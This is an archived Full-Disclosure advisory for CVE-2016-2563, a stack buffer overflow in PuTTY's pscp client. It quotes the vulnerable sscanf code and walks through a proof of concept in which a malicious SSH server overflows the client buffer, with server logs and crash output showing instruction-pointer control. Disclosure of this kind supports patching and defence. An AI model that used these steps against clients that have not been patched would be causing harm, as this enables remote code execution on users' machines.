| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Sun, 6 Mar 2016 17:50:15 +0100
From: "oststrom \(public\)" <pub@...strom.com>
To: <fulldisclosure@...lists.org>
Subject: [FD] CVE-2016-2563 - PuTTY/PSCP <=0.66 buffer overflow -
vuln-pscp-sink-sscanf
A potential addition to your honeypots.
Author: <github.com/tintinweb>
Ref:
https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-2563
Version: 0.1
Date: Feb 20th, 2016
Tag: putty pscp client-side post-auth stack buffer overwrite when
processing remote file size
Overview
--------
Name: putty
Vendor: sgtatham
References: * http://www.chiark.greenend.org.uk/~sgtatham/putty/ [1]
Version: 0.66 [2]
Latest Version: 0.66
Other Versions: 0.59 [3] (~9 years ago) <= affected <= 0.66
Platform(s): win/nix
Technology: c
Vuln Classes: stack buffer overwrite (CWE-121)
Origin: remote
Min. Privs.: post auth
CVE: CVE-2016-2563
Description
-----------
quote website [1]
>PuTTY is a free implementation of SSH and Telnet for Windows and Unix
platforms, along with an xterm terminal emulator. It is written and
maintained primarily by Simon Tatham.
Summary
-------
The putty SCP command-line utility (pscp) is missing a bounds-check for a
stack
buffer when processing the SCP-SINK file-size response to a SCP download
request.
This may allow a malicious server to overwrite the stack buffer within the
client-
application potentially leading to remote code execution.
PoC see ref github.
Patch see ref github.
Besides that, two minor issues have been reported in putty packet handling:
* DoS condition in the parsing of SSH-Strings that lead to a nullptr read.
(connect putty to `poc.py` and type `x11exploit` to trigger one occurrence
of a crash, also works with x11forwarding disabled in putty)
* DoS condition in the handling of unrequested forwarded-tcpip channels open
requests that lead to a nullptr read. (connect putty to `poc.py` and type
`forwardedtcpipcrash` to trigger crash)
Details
-------
The vulnerable code is located in `pscp.c` [4] line 1498 (HEAD) and is based
on an
unbound `sscanf` string format descriptor storing an arbitrary length string
in
a 40byte fixed size stack buffer `sizestr[40]`.
Inline annotations are prefixed with `//#!`
1491 /*
1492 * If we get here, we must have seen SCP_SINK_FILE or
1493 * SCP_SINK_DIR.
1494 */
1495 {
1496 char sizestr[40];
//#! fixed size buffer
1497
1498 if (sscanf(act->buf, "%lo %s %n", &act->permissions, //#!
unbound cstr %s written to sizestr
1499 sizestr, &i) != 2)
Proof of Concept
----------------
Prerequisites:
* install python 2.7.x
* issue `#> pip install paramiko` to install `paramiko` ssh library for
python 2.x
* make sure `poc.py` and `test_rsa.key` are in the same folder
poc:
Usage: [<listen_ip:port>]
Default: 0.0.0.0:22
1. start the malicious sshd by running `poc.py` which by default will bind
all ips, port 22.
INFO monkey-patch paramiko.Transport.open_channel
INFO monkey-patch paramiko.Transport._check_banner
INFO --start--
INFO ServerHostKey: 60733844cb5186657fdedaa22b5a57d5
INFO BIND: ('0.0.0.0', 22)
INFO Listening for connection ...
...
2. try to retrieve any file from the malicious sshd by executing `pscp`.
Provide any user/password/pubkey, the server will just accept anything.
c:\> pscp.exe -scp root@...alhost:/etc/passwd .
root@...alhost's password: anything
3. key-exchange and authentication
...
INFO new peer: ('127.0.0.1', 6127)
DEBUG starting thread (server mode): 0x2411750L
INFO Connected (version 2.0, client PuTTY_Release_0.66)
DEBUG kex algos:[u'diffie-hellman-group-exchange-sha256',
u'diffie-hellman-group-exchange-sha1', u'diffie-hellman-group14-sha1',
u'diffie-hellman-group1-sha1', u'rsa2048-sha256', u'rsa1024-sha1'] server
key:[u'ssh-rsa', u'ssh-dss'] client encrypt:[u'aes256-ctr', u'aes256-cbc',
u'rijndael-cbc@...ator.liu.se', u'aes192-ctr', u'aes192-cbc', u'aes128-ctr',
u'aes128-cbc', u'blowfish-ctr', u'blowfish-cbc', u'3des-ctr', u'3des-cbc',
u'arcfour256', u'arcfour128'] server encrypt:[u'aes256-ctr', u'aes256-cbc',
u'rijndael-cbc@...ator.liu.se', u'aes192-ctr', u'aes192-cbc', u'aes128-ctr',
u'aes128-cbc', u'blowfish-ctr', u'blowfish-cbc', u'3des-ctr', u'3des-cbc',
u'arcfour256', u'arcfour128'] client mac:[u'hmac-sha2-256', u'hmac-sha1',
u'hmac-sha1-96', u'hmac-md5'] server mac:[u'hmac-sha2-256', u'hmac-sha1',
u'hmac-sha1-96', u'hmac-md5'] client compress:[u'none', u'zlib'] server
compress:[u'none', u'zlib'] client lang:[u''] server lang:[u''] kex
follows?False
DEBUG Ciphers agreed: local=aes256-ctr, remote=aes256-ctr
DEBUG using kex diffie-hellman-group14-sha1; server key type ssh-rsa;
cipher: local aes256-ctr, remote aes256-ctr; mac: local hmac-sha1, remote
hmac-sha1; compression: local none, remote none
DEBUG Switch to new keys ...
DEBUG Auth request (type=none) service=ssh-connection, username=root
INFO Auth rejected (none).
INFO REQUEST: allowed auths:
gssapi-keyex,gssapi-with-mic,password,publickey
DEBUG Auth request (type=gssapi-with-mic) service=ssh-connection,
username=root
INFO Auth rejected (gssapi-with-mic).
INFO REQUEST: allowed auths:
gssapi-keyex,gssapi-with-mic,password,publickey
DEBUG Auth request (type=password) service=ssh-connection, username=root
INFO REQUEST: CHECK_AUTH_PASS u'root' xxxxx
INFO * SUCCESS
INFO Auth granted (password).
...
4. `pscp` tries to retrieve file. Server responds with fake timestamps,
permissions and an overly long filesize string overflowing the 40byte client
buffer.
...
INFO REQUEST: CHAN session 0
DEBUG [chan 0] Max packet in: 32768 bytes
DEBUG [chan 0] Max packet out: 16384 bytes
DEBUG Secsh channel 0 (session) opened.
DEBUG [chan 0] Unhandled channel request
"simple@...ty.projects.tartarus.org"
INFO REQUEST: EXEC <paramiko.Channel 0 (open) window=2147483647 ->
<paramiko.Transport at 0x2411750L (cipher aes256-ctr, 256 bits) (active; 1
open channel(s))>> scp -f /a
INFO Authenticated!
INFO wait for event
INFO wait for event
WARNING Oh, hello putty/pscp PuTTY_Release_0.66, nice to meet you!
INFO send (time): 'T1444608444 0 1444608444 0\n'
INFO send (perm): 'C755 A...A \n'
INFO boom!
ERROR Peer did not ask for a shell within 10 seconds.
DEBUG EOF in transport thread
...
5. `pscp` crashes due to RET overwrite with EIP control (`\x41`==`A`). Can
be turned into RCE (see annotation, EIP control)
...
CONTEXT: 0000000000000000 -- (.cxr 0x0;r)
eax=00000000 ebx=00000000 ecx=00187dc0 edx=00000000 esi=003f1061
edi=00000000
eip=41414141 esp=00187e18 ebp=41414141 iopl=0 nv up ei pl zr na pe
nc //#! EIP control
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b
efl=00010246
41414141 ?? ???
...
PROCESS_NAME: pscp.exe
READ_ADDRESS: 0000000041414141
FOLLOWUP_IP:
unknown!noop+0
41414141 ?? ???
FAILED_INSTRUCTION_ADDRESS:
unknown!noop+0
41414141 ?? ???
IP_IN_FREE_BLOCK: 41414141
BUGCHECK_STR:
APPLICATION_FAULT_BAD_INSTRUCTION_PTR_INVALID_POINTER_READ_ZEROED_STACK_EXPL
OITABLE
LAST_CONTROL_TRANSFER: from 0000000041414141 to 0000000041414141
STACK_TEXT:
00187e14 41414141 41414141 41414141 41414141 0x41414141
00187e18 41414141 41414141 41414141 41414141 0x41414141
...
Notes
-----
Verified, resolved and released within one week. quite impressive.
Vendor response: see [5]
References
----------
[1] http://www.chiark.greenend.org.uk/~sgtatham/putty/
[2] http://tartarus.org/~simon-git/gitweb/?p=putty.git
[3]
http://tartarus.org/~simon-git/gitweb/?p=putty.git;a=tree;h=5baaacba07aff7bd
680cf9954fee44a0c11dc968;hb=c8ac73ada6aa865ce9f4d0e389ba210072bc0b57
[4]
http://tartarus.org/~simon-git/gitweb/?p=putty.git;a=blob;f=pscp.c;hb=HEAD
[5]
http://www.chiark.greenend.org.uk/~sgtatham/putty/wishlist/vuln-pscp-sink-ss
canf.html
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists